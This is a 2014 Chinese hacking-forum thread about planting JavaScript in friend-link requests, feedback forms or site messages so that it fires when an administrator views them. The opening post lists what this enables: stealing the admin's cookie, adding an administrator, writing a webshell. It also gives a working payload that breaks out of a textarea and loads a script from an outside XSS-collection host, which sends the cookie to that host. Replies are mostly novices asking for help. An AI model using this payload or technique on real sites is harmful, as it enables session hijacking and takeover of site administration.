查看: 17056|回复: 9

你这样做,何不如CSRF?

[复制链接]

该用户从未签到

发表于 2014-8-14 10:06:58 | 显示全部楼层 |阅读模式
原帖地址:http://www.ihonker.org/thread-3271-1-4.html

看了贴,我才知道这位仁兄可能不了解CSRF这么个好东西

从友情链接或者站内信以及留言反馈的地方,通过CSRF拿到后台或者拿到管理员账号密码早已不是新鲜事了。

我只是来提醒一下的


====================================================

比如:我们在友情链接申请的地方,放上一段JS,使得管理员点击(甚至都不用点击),鼠标移动上来

或者打开页面,就能触发xss

1.xss直接获取cookie

2.CSRF 发送cookie

3.CSRF 添加管理员

4.CSRF 生成一句话

5.CSRF 多了去了


例如直接拿cookie:

</textarea>'"><script src=http://x.xxoo.cc/8OTSbY?1407981679></script>

这是xss平台的代码,cookie值会发送到平台地址x.xxoo.cc对应的用户去。


乌云很多CSRF的组合拳应用,有个朋友出了一套组合拳

http://www.wooyun.org/bugs/wooyun-2014-071680



回复

使用道具 举报

该用户从未签到

发表于 2014-8-14 10:45:15 | 显示全部楼层
乌云 的那个洞目前还看不了
回复 支持 反对

使用道具 举报

  • TA的每日心情
    慵懒
    2017-1-5 19:19
  • 签到天数: 238 天

    [LV.7]常住居民III

    发表于 2014-8-14 11:53:56 | 显示全部楼层
    楼主的这个方法不错,可惜俺小白不会构造JS语句,这是蛋疼的地方啊
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2014-8-14 12:37:52 | 显示全部楼层
    要利用CSRF,首先要存在CSRF

    点评

    当然,这也需要一定的条件。 条件不支持,这条路也行不通 话说论坛的表情能换点新鲜的吗? 总是这几个表情  详情 回复 发表于 2014-8-14 17:06
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-9-8 19:37
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-8-14 13:17:19 | 显示全部楼层
    个人表示还不会csrf,求大牛指点
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2014-8-14 17:06:52 | 显示全部楼层
    90_ 发表于 2014-8-14 12:37
    要利用CSRF,首先要存在CSRF

    当然,这也需要一定的条件。

    条件不支持,这条路也行不通

    话说论坛的表情能换点新鲜的吗?

    总是这几个表情

    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-8-15 15:45:54 | 显示全部楼层
    学习一下,看帖就要回复,
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-8-17 21:34:49 | 显示全部楼层
    楼主的这个方法不错,可惜俺小白不会构造JS语句,这是蛋疼的地方啊
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2014-8-18 01:26:25 | 显示全部楼层
    XSS盲打
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-8-22 14:24
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-8-18 20:42:23 | 显示全部楼层
    我是电脑小白,打酱油的,路过学习
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-24 04:09 , Processed in 0.027288 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部